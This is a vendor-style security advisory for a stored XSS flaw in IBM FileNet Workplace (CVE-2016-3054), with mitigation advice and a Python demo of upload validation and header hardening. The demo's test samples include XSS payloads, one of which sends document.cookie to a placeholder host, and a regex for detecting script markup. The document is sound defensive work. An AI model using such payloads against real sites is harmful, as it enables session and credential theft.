FileNet Workplace is susceptible to the File Upload XSS vulnerability
Relevant CVE Information: CVEID: CVE-2016-3054
DESCRIPTION: IBM FileNet Workplace is vulnerable to cross-site scripting. An authenticated user can upload a file containing arbitrary JavaScript to the repository; when another user views that content through the Web UI, the script executes in the context of the Workplace application, altering the intended functionality and potentially disclosing credentials within a trusted session.
CVSS Base Score: 5.4
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/114753 for the current score
CVSS Environmental Score: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)
Affected Products and Versions: FileNet Workplace 4.0.2
Remediation/Fixes: Refer to the Workarounds and Mitigations section.
There are two different approaches that can be used to address this vulnerability: preventing malicious files from being uploaded, and preventing uploaded content from being executed when it is viewed. You may choose to implement only one or to use both.
The following are some suggestions on ways to prevent malicious files from being uploaded or executed. These methods have not been implemented or tested by IBM. They are just examples. For detailed implementation plans, please consult IBM ECM Lab Services or an IBM ECM Business Partner.
To avoid malicious content being entered into the P8 repository:
(1) Create a custom event action that is triggered on an AddDocument event and that either checks the file type being added (from the file content, not only the client-supplied name or extension) or calls a file scanner to validate the contents before the content is added.
(2) Configure a file scanner to scan the storage volume where content is being saved and have it send an alert when it finds malicious content.
To prevent content that contains JavaScript code from being executed when it is viewed by AE:
(1) Force JavaScript files to be viewed as text. An AE response filter could be implemented to change the MIME type from JavaScript to text (text/plain). Note that a MIME type change on its own is not reliable, because browsers may sniff the body and still treat it as HTML or script; pair it with an X-Content-Type-Options: nosniff header and serve such documents as downloads (Content-Disposition: attachment) rather than inline.
(2) Configure your browser to not execute JavaScript files.
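The following is an added, stand-alone illustration of both mitigation families above (the upload-time check an AddDocument event action would perform, and the header rewrite an AE response filter would apply). It is not IBM's code and not a P8 event action or servlet filter: the function names, the extension allowlist, the active-content patterns and the sample uploads are assumptions made for this example. A real event action would be written against the Content Engine API and a real response filter as a Java servlet Filter; the decision logic would be the same.

```python
"""Added illustration (not IBM's code): upload-time content check and
response-side MIME hardening for a P8/AE-style document store.

Function names, the allowlist and the sample files are assumptions made
for this example; a real P8 event action would be written against the
Content Engine API and a real AE response filter as a Java servlet Filter.
"""
import re

# Hypothetical allowlist: extension -> (expected MIME type, magic bytes).
# Only types that browsers will not execute as a document are admitted.
ALLOWED_TYPES = {
    "pdf": ("application/pdf", b"%PDF-"),
    "png": ("image/png", b"\x89PNG\r\n\x1a\n"),
    "jpg": ("image/jpeg", b"\xff\xd8\xff"),
    "txt": ("text/plain", b""),
}

# Markers of active content, matched case-insensitively over the start of
# any upload, so a .txt that carries <script> or an inline SVG is refused.
ACTIVE_CONTENT = re.compile(
    rb"<\s*script|javascript:|<\s*svg|on(?:load|error|click)\s*=|"
    rb"<\s*iframe|<\s*object|<\s*embed",
    re.IGNORECASE,
)


def check_upload(filename: str, data: bytes):
    """Decide whether an AddDocument request may proceed.

    Returns (accepted, reason_or_mime). Mirrors repository mitigation (1):
    validate the file type from the content rather than from the
    client-supplied name, and refuse anything a browser could render as
    script or HTML.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_TYPES:
        return False, f"extension '{ext}' not in allowlist"
    mime, magic = ALLOWED_TYPES[ext]
    if magic and not data.startswith(magic):
        return False, f"content does not match {mime} magic bytes"
    # Text-like content (and a renamed HTML file) can still carry markup.
    if ACTIVE_CONTENT.search(data[:65536]):
        return False, "active content (script/markup) found in file body"
    return True, mime


# MIME types a browser would execute in the AE origin if served as-is.
EXECUTABLE_TYPES = {
    "text/html", "application/xhtml+xml", "image/svg+xml",
    "application/javascript", "text/javascript",
    "application/x-javascript", "application/ecmascript",
}


def harden_response(content_type: str, filename: str) -> dict:
    """Compute the headers a document-download response filter would set
    (viewer mitigation (1)). Executable types are downgraded to text/plain,
    and nosniff plus an attachment disposition are added so the browser
    neither re-sniffs the body as HTML nor renders it inline in the
    Workplace origin."""
    base = content_type.split(";", 1)[0].strip().lower()
    if base in EXECUTABLE_TYPES:
        base = "text/plain"
    safe_name = re.sub(r"[^\w.\-]", "_", filename)
    return {
        "Content-Type": base,
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
    }


if __name__ == "__main__":
    # Constructed sample uploads (not real FileNet content).
    samples = {
        "report.pdf": b"%PDF-1.4\n%...\n",
        "evil.html": b"<html><script>location='http://x/'+document.cookie</script>",
        "notes.txt": b"plain text, nothing special",
        "sneaky.txt": b"hello <SCRIPT>alert(1)</SCRIPT>",
        "fake.png": b"<svg onload=alert(1)>",
    }
    for name, body in samples.items():
        print(name, check_upload(name, body))
    print(harden_response("text/html; charset=utf-8", "evil.html"))
```

The upload check deliberately keys the allowlist on magic bytes and the body, not the extension alone, because the extension and the client-declared MIME type are attacker-controlled. The response side combines the MIME downgrade with nosniff and an attachment disposition; either header on its own leaves a browser free to render the file in the Workplace origin.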